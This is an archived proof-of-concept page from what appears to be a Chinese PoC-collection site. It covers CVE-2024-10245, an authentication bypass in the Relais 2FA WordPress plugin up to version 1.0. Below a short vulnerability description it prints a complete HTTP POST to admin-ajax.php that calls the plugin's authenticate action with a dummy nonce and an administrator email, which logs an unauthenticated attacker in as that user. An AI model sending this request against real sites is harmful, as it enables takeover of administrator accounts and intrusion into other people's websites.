POC详情: ebb587b7c27dc4a5a3053c550622ebfef40fe837

来源
关联漏洞
标题: WordPress plugin Relais 2FA 安全漏洞 (CVE-2024-10245)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Relais 2FA 1.0版本及之前版本存在安全漏洞,该漏洞源于包含一个身份验证绕过漏洞。
描述
Relais 2FA <= 1.0 - Authentication Bypass
介绍
# CVE-2024-10245
Relais 2FA &lt;= 1.0 - Authentication Bypass


# Description

The Relais 2FA plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0. This is due to incorrect authentication and capability checking in the 'rl_do_ajax' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-time-capsule-settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Origin: http://kubernetes.docker.internal
Connection: keep-alive

action=rl_do_ajax&rl_action=authenticate&nonce=213123123&email=admin@admin.com
```
文件快照

[4.0K] /data/pocs/ebb587b7c27dc4a5a3053c550622ebfef40fe837 └── [1.0K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。